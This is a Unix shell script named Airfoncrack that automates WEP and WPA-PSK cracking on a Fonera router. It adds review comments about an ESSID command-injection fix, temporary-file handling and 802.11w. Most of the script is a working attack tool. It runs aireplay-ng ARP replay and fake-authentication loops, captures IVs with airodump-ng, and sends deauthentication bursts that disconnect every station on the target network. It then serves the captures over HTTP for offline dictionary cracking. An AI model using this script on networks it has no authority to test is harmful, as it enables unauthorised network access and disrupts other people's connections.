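#!/bin/ash
# Airfoncrack
# Automated wireless cracking script
# v1.0 by Nitz
# Thanks to wireless, lemmke, badblody and ring0
# Start date: 5-04-2007
# End date: 11-04-2007
#
# Flow (all state is passed between functions through globals):
#   saca_ip           -> IP    address of eth0, used only in the messages
#   prepara_escanear  -> ath1 in station mode for scanning
#   buscaredes        -> CANAL / BSSID / ESSID of the network picked in a menu
#   wepowpa           -> ENCRIPTACION ("WEP" or "WPA-PSK")
#   prepara_crack     -> ath0 in monitor mode
#   crackwep / crackwpapsk -> start the aircrack-ng suite tools and exit
#
# Review notes on this revision:
#   * ESSIDs in the scan output are chosen by whoever operates the access
#     point, so they are untrusted input. The network menu used to be
#     assembled as a string and run with `sh -c`, which let `$(...)` or
#     backticks inside an ESSID execute on this device. The menu entries are
#     now passed to dialog as separate arguments and never re-parsed.
#   * The scratch file had a fixed name in /tmp; it is now created by mktemp
#     and removed on every exit path this script controls.
#   * Signal 9 (KILL) cannot be trapped and was dropped from the trap list.
#   * The aircrack-ng suite command lines are reproduced as published; only
#     the handling of scan data, temporary files and redirections changed.
#   * Capture files are written under /tmp/www and, per the script's own
#     messages, are reachable at http://$IP/ -- presumably by any host that
#     can reach the device's web server.
#   * NOTE(review): the deauthentication step below is an unprotected
#     management-frame technique; 802.11w (protected management frames) is
#     the standard countermeasure, and WEP should be treated as retired.

BACKTITLE="AirFonCrack v1.0 by Nitz"

# Private scratch file for scan output and dialog selections.
TMPFILE=$(mktemp /tmp/airfoncrack.XXXXXX) || {
  echo "airfoncrack: cannot create temporary file" >&2
  exit 1
}

# Show the transient "please wait" box used between steps.
wait_box() {
  dialog --backtitle "$BACKTITLE" --infobox "Please, wait..." 3 19
}

# Remove the scratch file, clear the screen and leave (user cancelled).
abort_clean() {
  rm -f "$TMPFILE"
  clear
  exit
}

# Destroy every virtual interface the script may have created earlier.
# Errors are discarded on purpose: most of these will not exist.
reset_vaps() {
  for vap in ath0 ath1 kis0 wifi0; do
    wlanconfig "$vap" destroy >/dev/null 2>&1
  done
}

# Sets IP to the "inet addr" of eth0 as printed by ifconfig.
saca_ip() {
  IP=$(ifconfig eth0 | grep "inet addr:" | sed 's/ inet addr://g' | awk '{ print $1 }')
}

# Recreates ath1 on wifi0 in station mode and brings it up for scanning.
prepara_escanear() {
  reset_vaps
  wlanconfig ath1 create wlandev wifi0 wlanmode sta >/dev/null 2>&1
  ifconfig ath1 up >/dev/null 2>&1
}

# Recreates ath0 on wifi0 in monitor mode, fixes the rate at 1M, brings it up.
prepara_crack() {
  reset_vaps
  wlanconfig ath0 create wlandev wifi0 wlanmode monitor >/dev/null 2>&1
  iwconfig ath0 rate 1M >/dev/null 2>&1
  ifconfig ath0 up >/dev/null 2>&1
}

# Scans with ath1, offers the networks found in a dialog menu and sets
# CANAL, BSSID and ESSID from the chosen entry. Exits if nothing is chosen.
buscaredes() {
  iwlist ath1 scan > "$TMPFILE"
  BSSID=$(grep " Cell " "$TMPFILE" | awk '{ print $5 }')

  # Build the menu as positional parameters: one "tag" "item" pair per cell.
  # Scan data is only ever passed as data, never parsed as shell code.
  current=1
  set --
  # Unquoted on purpose: $BSSID is a whitespace-separated list of addresses.
  for i in $BSSID; do
    CANAL=$(grep "(Channel " "$TMPFILE" | awk '{ print $4 }' | sed 's/)$//g' | sed -n "${current}p")
    ESSID=$(grep ESSID "$TMPFILE" | sed 's/ ESSID:"//g' | sed 's/"$//g' | sed -n "${current}p")
    set -- "$@" "$CANAL $i $ESSID" ""
    current=$((current + 1))
  done

  # Nothing to choose from: leave instead of parsing dialog's error text
  # as if it were a selection.
  if [ "$#" -eq 0 ]; then
    abort_clean
  fi

  # dialog writes the selected tag ("CANAL BSSID ESSID") to stderr.
  dialog --backtitle "$BACKTITLE" \
    --menu 'Select a wireless network:\n CH# . BSSID . . . . . . ESSID' 0 0 0 \
    "$@" 2>"$TMPFILE"

  # Only the first word of the ESSID survives the field split; double quotes
  # in it are backslash-escaped, as in the published version.
  ESSID=$(awk '{ print $3 }' "$TMPFILE" | sed 's/"/\\"/g')
  BSSID=$(awk '{ print $2 }' "$TMPFILE")
  CANAL=$(awk '{ print $1 }' "$TMPFILE")

  if [ -z "$ESSID" ]; then
    abort_clean
  fi
}

# Asks which protection to work on and sets ENCRIPTACION; exits on cancel.
wepowpa() {
  dialog --backtitle "$BACKTITLE" --menu "What do you want to crack?" 0 0 0 \
    "WEP" "" "WPA-PSK" "" 2>"$TMPFILE"
  ENCRIPTACION=$(cat "$TMPFILE")
  if [ -z "$ENCRIPTACION" ]; then
    abort_clean
  fi
}

# WEP path: starts two aireplay-ng jobs in the background, then either
# captures IVs for download or captures and runs aircrack-ng on the device.
# Background jobs are left running when the function exits (see the final
# message printed to the user).
crackwep() {
  rm -f /tmp/www/airfoncrack-packages*
  wait_box
  aireplay-ng -3 ath0 -b $BSSID -h $MAC ath0 >/dev/null 2>&1 &
  while true; do
    aireplay-ng -1 1 -e \"$ESSID\" -a $BSSID -h $MAC ath0 >/dev/null 2>&1
  done &

  dialog --backtitle "$BACKTITLE" --menu "Now airodump-ng is sniffing ivs. You can crack these ivs with aircrack-ng in fonera, but is better crack these ivs in your PC. What do you want to do?" 0 0 0 \
    "Crack ivs in my PC" "" "Crack ivs with fonera software" "" 2>"$TMPFILE"

  case "$(cat "$TMPFILE")" in
    'Crack ivs in my PC')
      dialog --backtitle "$BACKTITLE" --msgbox "You can dowload ivs file from http://$IP/airfoncrack-packages-01.ivs and try to crack with your aircrack-ng :)" 0 0
      rm -f "$TMPFILE"
      # Foreground capture: returns only when airodump-ng is stopped.
      airodump-ng --ivs -w /tmp/www/airfoncrack-packages --channel $CANAL --bssid $BSSID ath0
      ;;
    'Crack ivs with fonera software')
      clear
      airodump-ng --ivs -w /tmp/www/airfoncrack-packages --channel $CANAL --bssid $BSSID ath0 >/dev/null 2>&1 &
      wait_box
      sleep 10
      aircrack-ng /tmp/www/airfoncrack-packages-01.ivs
      echo
      echo "Aircrack have stopped. If you haven't the WEP key because you don't have enough ivs yet, you can rerun 'aircrack-ng /tmp/www/airfoncrack-packages-01.ivs'."
      ;;
    *)
      abort_clean
      ;;
  esac

  rm -f "$TMPFILE"
  echo
  echo "Remember: You can download ivs file from http://$IP/airfoncrack-packages-01.ivs and try to crack with your aircrack-ng :)"
  echo
  echo "Now a lot of processes are working, airodump-ng and aireplay-ng. You can kill them running 'killall airfoncrack & killall aireplay-ng & killall airodump-ng'."
  exit
}

# WPA-PSK path: starts a background capture and, if the user agrees, sends
# aireplay-ng -0 bursts (the dialog text warns that every associated station
# is disconnected). The key search itself is left to the user's PC.
crackwpapsk() {
  rm -f /tmp/www/airfoncrack-packages*
  airodump-ng --ivs -w /tmp/www/airfoncrack-packages --channel $CANAL --bssid $BSSID ath0 >/dev/null 2>&1 &

  if dialog --backtitle "$BACKTITLE" --yesno "Fonera needs snif a handshake. You can cause it selecting \"Yes\", but all asociated stations will fall.\n\nDo you want to cause the handshake?" 0 0; then
    wait_box
    aireplay-ng -0 5 -a $BSSID ath0 >/dev/null 2>&1
    while dialog --backtitle "$BACKTITLE" --yesno "Do you want to repeat the attack?" 0 0; do
      wait_box
      aireplay-ng -0 5 -a $BSSID ath0 >/dev/null 2>&1
    done
  fi

  dialog --backtitle "$BACKTITLE" --msgbox "You must dowload ivs file from http://$IP/airfoncrack-packages-01.ivs and try to crack with your aircrack-ng :)" 0 0
  rm -f "$TMPFILE"
  clear
  echo "Remember: You must download ivs file from http://$IP/airfoncrack-packages-01.ivs and try to crack with your aircrack-ng :)"
  echo
  echo "For get the WPA-PSK key, run in your PC: aircrack-ng -a 2 /PATH/airfoncrack-packages-01.ivs -w /PATH/dictionary-file"
  echo
  echo "Now a lot of processes are working, airodump-ng and aireplay-ng. You can kill them running 'killall airfoncrack & killall aireplay-ng & killall airodump-ng'."
  exit
}

# Signal handler: remind the user about leftover background jobs, drop the
# scratch file and leave. The jobs themselves are not stopped here.
on_signal() {
  echo
  echo "Maybe airodump-ng and aireplay-ng are running, try to run 'killall airfoncrack & killall airodump-ng & killall aireplay-ng'"
  rm -f "$TMPFILE"
  exit
}
trap on_signal 1 2 3 15

saca_ip
prepara_escanear
wait_box
sleep 3
buscaredes
wepowpa
prepara_crack
wait_box
sleep 5

# Hardware address taken from the wifi0 line of ifconfig (fifth field).
MAC=$(ifconfig | grep wifi0 | awk '{ print $5 }')

case "$ENCRIPTACION" in
  'WEP')
    crackwep
    ;;
  'WPA-PSK')
    crackwpapsk
    ;;
esac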